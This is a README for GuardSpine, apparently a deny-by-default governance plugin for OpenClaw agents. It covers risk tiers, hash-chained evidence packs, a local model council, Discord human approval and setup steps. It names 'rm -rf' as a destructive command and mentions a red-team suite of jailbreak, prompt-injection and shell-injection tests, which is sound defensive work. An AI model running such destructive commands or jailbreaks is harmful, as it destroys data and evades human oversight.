OpenClaw integration plugin for GuardSpine - the unified governance and evidence system for AI-assisted work.

This plugin brings GuardSpine's deny-by-default governance to OpenClaw agents. Gates every tool call through L0-L4 risk tiers with hash-chained evidence packs, a 3-model local council, and remote human approval.

User Request
    |
    v
+-------------------+
| OpenClaw Agent    |
| (any model)       |
+--------+----------+
         |
         v
+-------------------+     +-------------------+
| GuardSpine Plugin |---->| Risk Classifier   |
| before_tool_call  |     | L0-L4 tier        |
+--------+----------+     +-------------------+
         |
    +----+----+----+----+
    |    |    |    |    |
   L0   L1   L2   L3   L4
   no   log  evidence  council  council
   op   only pack     3-model  + human
                      vote     approval

AI agents with tool access (shell, files, network) need governance that scales with risk. A greeting should flow freely. A rm -rf should require multi-model review. A credential change should require human sign-off. This plugin resolves the tension between autonomy and oversight by gating on risk and blast radius.

Bash commands are dynamically escalated based on content (regex pattern matching on destructive/network/credential patterns).

# Clone into OpenClaw extensions
cd ~/.openclaw/extensions
git clone https://github.com/DNYoussef/guardspine-openclaw guardspine

# Add to openclaw.json
# Under "plugins": add "guardspine"

• OpenClaw v2026.1.x+
• Ollama running locally (for L3 council)
• 3 models pulled (6GB+ VRAM, runs sequentially):

ollama pull qwen3:8b
ollama pull falcon3:7b
ollama pull qwen2.5-coder:7b

In ~/.openclaw/openclaw.json, add under plugins:

{
  "guardspine": {
    "enforcement_mode": "shadow",
    "council_endpoint": "http://YOUR-EXPLICIT-OLLAMA-ENDPOINT"
  }
}

Modes:

• shadow - Run the full classification and council path, log what would happen, do not block
• enforce - Active gating with council and external human approval
• audit - Development-only pass-through. Requires GUARDSPINE_ALLOW_AUDIT_MODE=1
• disabled - Plugin loaded but inactive

Every L2+ tool call produces a SHA-256 hash-chained evidence entry. At session end, the full pack is written to ~/.openclaw/guardspine-logs/evidence-pack-{session}.json. Each entry links to the previous via chain_hash, making the audit trail tamper-evident.

Three Ollama models run sequentially (VRAM-safe, one at a time with unload between):

Each scores 5 dimensions (0-5): prompt injection resistance, blast radius, reversibility, secrets exposure, intent clarity. Aggregation is deterministic: any FAIL = FAIL, any ESCALATE = ESCALATE, 2+ PASS = PASS.

When a tool call hits L4, the plugin:

1. Sends a Discord DM to the configured approver via OpenClaw's runtime API (sendMessageDiscord)
2. Optionally writes a local dev inbox file only when GUARDSPINE_ALLOW_DEV_INBOX=1
3. Waits for an out-of-band approval via Discord reaction or an explicitly enabled local dev workflow

Approve via Discord: /approve <id> allow-once or the configured external approval workflow. There is no in-band model approval tool.

Configure the Discord target in openclaw.json:

{
  "plugins": {
    "entries": {
      "guardspine": {
        "discord_approval_target": "user:YOUR_DISCORD_USER_ID"
      }
    }
  }
}

This plugin connects to the broader GuardSpine ecosystem:

The OpenClaw extension. Hooks into before_tool_call, before_agent_start, after_tool_call, and agent_end. Provides 3 tools: guardspine_status, guardspine_audit_log, memory_status.

• guardspine-evidence-rubric.yaml - 5-dimension scoring rubric with hard fail conditions
• evaluate_evidence.py - Runs 3 auditors against evidence packs, deterministic aggregation
• Sample packs for testing

• rlm_docsync.py - 3-mode plugin: security audit, introspection, context reader
• rlm-docsync-plugin.yaml - OpenClaw manifest with governance tier mappings
• RLM context virtualization for 10M+ token navigation

• promptfooconfig.yaml - 310+ attack tests (Pliny L1B3RT4S jailbreaks, prompt injection, shell injection, RBAC bypass)
• regression.yaml - Known vulnerability regression tests
• run_harness.py - Orchestration with continuous hardening mode
• providers/guardspine_provider.py - Tests through the full governance stack

# 1. Install
cd ~/.openclaw/extensions
git clone https://github.com/DNYoussef/guardspine-openclaw guardspine

# 2. Start in shadow mode
# Edit openclaw.json: "guardspine": {"enforcement_mode": "shadow", "council_endpoint": "http://YOUR-EXPLICIT-OLLAMA-ENDPOINT"}

# 3. Restart gateway
openclaw gateway

# 4. Watch the logs
tail -f ~/.openclaw/guardspine-logs/guardspine-$(date +%Y-%m-%d).jsonl

# 5. Run red team smoke test
cd ~/.openclaw/extensions/guardspine/redteam
pip install requests
PYTHONIOENCODING=utf-8 python run_harness.py --quick

# 6. When satisfied, switch to enforce mode
# Edit openclaw.json: "guardspine": {"enforcement_mode": "enforce", "council_endpoint": "http://YOUR-EXPLICIT-OLLAMA-ENDPOINT"}

Apache-2.0